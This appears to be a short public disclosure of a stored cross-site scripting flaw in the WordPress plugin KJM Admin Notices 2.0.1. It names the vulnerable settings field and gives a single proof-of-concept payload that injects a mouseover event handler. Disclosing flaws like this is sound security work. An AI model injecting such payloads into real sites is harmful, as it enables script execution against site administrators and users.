Skip to content

Latest commit

 

History

History
9 lines (9 loc) · 542 Bytes

KJM Admin Notices.md

File metadata and controls

9 lines (9 loc) · 542 Bytes

Exploit Title: WrodPress Plugin KJM Admin Notices——Stored Cross-Site Scripting

Exploit Author: Thinkland Security Team

Version : V 2.0.1

Vulnerability Type: Stored Cross-Site Scripting

Tested on Windows 10 、XAMPP

Vulnerability proof:

  1. Settings》KJM Admin Notices 》Allow Role or Capability to Edit ,insert the xss payload "OnMoUsEoVeR=prompt(1)// image